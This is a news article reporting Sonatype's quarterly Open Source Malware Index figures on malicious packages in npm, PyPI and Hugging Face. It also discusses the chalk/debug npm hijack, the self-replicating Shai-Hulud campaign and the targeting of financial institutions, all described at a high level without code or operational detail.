Open source malware, a term that has gained traction in recent years, refers to malicious code cleverly concealed within software packages shared on popular platforms such as npm, PyPI, and Hugging Face. These repositories, which host a plethora of free tools essential for developers, have unfortunately become prime targets for cybercriminals seeking to infiltrate trusted systems with harmful code.
According to Sonatype’s recently released Open Source Malware Index, a staggering 34,319 malicious open source packages were identified in the third quarter of this year alone. Over the past six years, the company has uncovered a total of 877,522 malicious packages. The evolving tactics of attackers have become increasingly sophisticated; they now employ artificial intelligence to seamlessly embed malware within the very tools developers rely on.
This new breed of malware is designed to masquerade as ordinary code while stealthily stealing data or maintaining long-term access to systems. Rather than launching overt attacks that generate noise and alert security teams, these criminals have shifted their focus to stealthy operations. By leveraging AI, they craft malware that blends in with legitimate code, complicating detection efforts until significant damage has occurred.
Why Are the Numbers So High?
The rise in malicious packages can be attributed to the inherent vulnerabilities within open source ecosystems. These platforms thrive on community trust and open collaboration, allowing anyone to upload packages. Once a compromised file is published, it can rapidly disseminate across numerous projects.
In the third quarter, data exfiltration malware constituted 37% of all detected malicious open source packages, as reported by Sonatype. This type of malware is particularly insidious, focusing on stealing credentials, access tokens, and other sensitive information. Given that developers frequently incorporate open source libraries into corporate software, attackers effectively gain a backdoor into organizational systems.
Additionally, the evolution of multi-stage attacks has contributed to the alarming statistics. Nearly 38% of all threats identified in Q3 were categorized as “droppers,” lightweight files that covertly install additional payloads such as backdoors or information stealers. The prevalence of backdoor-laden packages surged by 143% compared to the previous quarter. These layered attacks complicate detection, as the initial file appears innocuous, yet it quietly retrieves other malware in the background.
More from News
Interestingly, the once-popular crypto mining tools have seen a decline, now accounting for only 4% of total malware this quarter, down from 6%. This shift indicates that criminals are moving away from easily detectable code and are instead investing in long-term strategies that yield a consistent stream of stolen data or financial access.
Who Is Being Targeted?
Data indicates that financial organizations are bearing the brunt of these attacks. Sonatype’s research reveals that 47% of blocked open source malware attempts in Q3 were aimed at banks and other financial services. The primary objective for these attackers is to acquire money, credentials, and confidential information that can be exploited or sold for further malicious activities.
Moreover, by directly targeting developers and infecting the tools they utilize, criminals can reach a broader audience of potential victims. The npm hijacking incident involving the widely used “chalk” and “debug” packages, which collectively boasted over two billion weekly downloads, exemplifies the potential damage that can arise when trusted software turns hostile.
Another notable campaign, dubbed Shai-Hulud, demonstrated a self-replicating capability, automatically spreading across repositories, pilfering credentials, and publishing new compromised packages without human intervention. This level of sophistication marks a significant advancement in malware design, where a single infection can proliferate across thousands of projects in a remarkably short timeframe.
What Happened Earlier This Year?
Reflecting on earlier developments, Sonatype reported in April that 17,954 malicious packages were identified in the first quarter of 2025, a record at that time. Over half of these targeted confidential data, a notable increase from 26% in late 2024. Financial institutions and government offices were frequent targets, as criminals sought tokens, system logs, and login credentials capable of breaching entire networks.
Since then, the situation has deteriorated, with the latest report indicating a rise in refined malware designed to steal information rather than merely disrupt operations. What initially began as an uptick in cryptominers and data stealers has evolved into highly organized attacks targeting trusted dependencies, underscoring the urgent need for enhanced vigilance in the open source community.
